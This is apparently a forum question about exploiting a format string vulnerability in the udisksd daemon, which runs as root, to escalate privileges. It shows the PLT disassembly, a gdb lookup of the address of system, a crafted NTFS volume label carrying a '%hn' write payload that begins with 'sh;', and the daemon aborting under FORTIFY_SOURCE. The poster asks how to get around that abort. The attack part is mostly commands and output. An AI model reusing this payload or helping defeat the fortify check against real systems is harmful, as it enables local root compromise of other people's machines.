
I found a daemon running as uid 0 that has a format string vulnerability. It is compiled with -Wformat-security and -D_FORTIFY_SOURCE=2 enabled. I'm trying to write an exploit for it, but what I get is:

0000000000018370 <g_log_structured@plt>:
   18370:   ff 25 d2 29 25 00       jmpq   *0x2529d2(%rip)        # 26ad48 <g_log_structured>
   47b36:   e8 35 08 fd ff          callq  18370 <g_log_structured@plt>

root@kali:~# gdb /usr/lib/udisks2/udisksd
GNU gdb (Debian 7.12-6+b1) 7.12.0.20161007-git
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/lib/udisks2/udisksd...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x19eb0
(gdb) r
Starting program: /usr/lib/udisks2/udisksd 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, 0x000055555556deb0 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x7ffff596f510 <__libc_system>
(gdb) q
A debugging session is active.

        Inferior 1 [process 2281] will be killed.

Quit anyway? (y or n) y
root@kali:~# mkfs.ntfs -L 'sh;#AAAA%24328x%7$hn%214719246x%8$hn' /dev/sdc1
root@kali:~# 
root@kali:~# blkid
/dev/sr0: UUID="2018-04-12-10-04-02-00" LABEL="Kali Live" TYPE="iso9660" PTUUID="a9ef3e16" PTTYPE="dos"
/dev/sda1: UUID="ab38774d-df2f-4712-88f6-563fc9e71ac0" TYPE="ext4" PARTUUID="1f4e07df-01"
/dev/sda5: UUID="789d84f1-2e1b-47c4-8b1c-aaa966153169" TYPE="swap" PARTUUID="1f4e07df-05"
/dev/loop0: TYPE="squashfs"
/dev/sdb1: LABEL="sh;#AAAA%24328x%7$hn%214719246x%8$hn" UUID="42FAB3436A7C2561" TYPE="ntfs" PTTYPE="dos" PARTUUID="7ddb2be9-01"
root@kali:~# /usr/lib/udisks2/udisksd
udisks-Message: 11:02:39.042: udisks daemon version 2.7.6 starting

** (udisksd:2468): WARNING **: 11:02:39.061: failed to load module mdraid: libbd_mdraid.so.2: cannot open shared object file: No such file or directory

(udisksd:2468): udisks-WARNING **: 11:02:39.063: Failed to load the 'mdraid' libblockdev plugin
udisks-Message: 11:02:39.220: Acquired the name org.freedesktop.UDisks2 on the system message bus
*** invalid %N$ use detected ***
Aborted

Is there any feasible way around this 'invalid %N$' abort?
